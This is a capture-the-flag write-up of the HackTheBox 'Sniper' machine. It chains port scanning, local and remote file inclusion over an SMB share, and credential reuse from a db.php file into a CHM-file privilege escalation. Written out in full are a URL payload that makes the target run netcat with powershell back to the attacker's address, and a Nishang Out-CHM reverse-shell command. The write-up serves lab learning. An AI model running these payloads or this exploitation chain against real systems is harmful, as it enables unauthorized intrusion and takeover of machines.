HackTheBox Writeup — Sniper

Hello Guys , I am Faisal Husaini. My username on HTB is “kNgF” . Also join me on discord.

The IP of this box is 10.10.10.151

Running masscan on it , we get

masscan -p1-65535,U:1-65535 10.10.10.151 --rate=1000 -e tun0

Running NMAP against the discovered Open Ports

Since we have only 4 ports open , and the interesting one first is the web , so we move to the web part first

Running Gobuster against the web

We see pretty good results , so moving onto the /blog directory

Clicking on the Language drop downs

The paramater “lang” can be potential to LFI , try some entries on it

While trying to access some Windows files like “Windows/system32/drivers/etc/hosts” and “Windows/win.ini” , we get some different results , but due to the web app behaviour , we cannot see it clearly , so we see the source code

We see that we hit the LFI successfully , but trying for RFI now where we create a normal phpinfo() php file and test it

For RFI , we will use samba to share the files so that we can test our RFI

Well here we tried the smbserver tool from Impacket , which unfortunately failed to work for this case , so tried Samba instead for this which we had to install it in our local machine and set it up , first by installing it using “apt-get install samba”

Here is our php script which we will test , also now we set up the samba config file

Now we start the smbd server using the command “service smbd start”

Moving onto the vulnerable URL and test our php file

Here we clearly see that we get RFI successfully , now we move onto getting command execution , for that we create one more simple php file

We can use this for getting command execution , let’s test it

We see that it got accessed successfully , since we didnt provided any parameter , we got no results , let’s test simple “dir” command

We get pretty results , to see the output in good format , we need to check the source code

But its a pain using Windows commands like this , so try to get a reverse shell connection

So I also upload a netcat windows binary into our SMB shares so that we could use it

http://10.10.10.151/blog/?lang=\\10.10.14.71\KNGF\kngf_rev.php&kngf=\\10.10.14.71\KNGF\nc64.exe%20-e%20powershell.exe%2010.10.14.71%209001

The above is the final which is used for reverse shell , looking back to the netcat listener

We got reverse shell successfully , now moving further in enumeration

As we were spawned in the webroot directory , we also remember from the Gobuster scan that we had a directory named user , so we moved into that directory here and listed out the files and folders

There is an interesting php file named db.php which might have some creds

We see a dbuser password , which might be password for the user account , so we check the user present on the current machine

We see that we have a user “Chris” on the box , so we use Powershell to switch the user using the below commands

As soon as we enter the last command , we get a new user prompt

We can see that we switched to Chris user successfully , now moving onto the User Flag which is usually located under the Desktop folder of the user

But we see that we cant run any command here except for whoami , maybe due to improper shell , so we try to get another by the same method

Looking back to the another netcat listener

We got a proper reverse shell now , so moving back to getting the User Flag

Moving onto the Priv Esc part

Looking on the main directory

We see a not so common folder Docs, entering it and listing its contents

We see 2 files, one is a txt file and the other is a pdf file and looking the contents of the note.txt file

We see a message for the user Chris, if we look clearly there is a message where the Sniper CEO says to drop a file. Maybe there is a autotask running

So we will create a CHM file using Nishang’s Out-CHM.ps1 powershell script in a Windows VM

Here was the script which we used along with the command at the end

Out-CHM -Payload “C:\Users\Chris\Desktop\nc64.exe -e powershell.exe 10.10.14.165 9003” -HHCPath “C:\Program Files (x86)\HTML Help Workshop”

As soon as we run the script , the CHM file gets created on the current location, i.e, Desktop folder , so we now copy this to our Linux machine and then import into the remote Sniper machine

So here we uploaded the CHM file in the /Docs folder and also before that setup our netcat listener on the other end , as soon as the file gets uploaded and moving onto the listener

We immediately got a reverse shell connection and this time as Administrator and moving futher to get the root flag which is usually stored under the Desktop folder

References

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover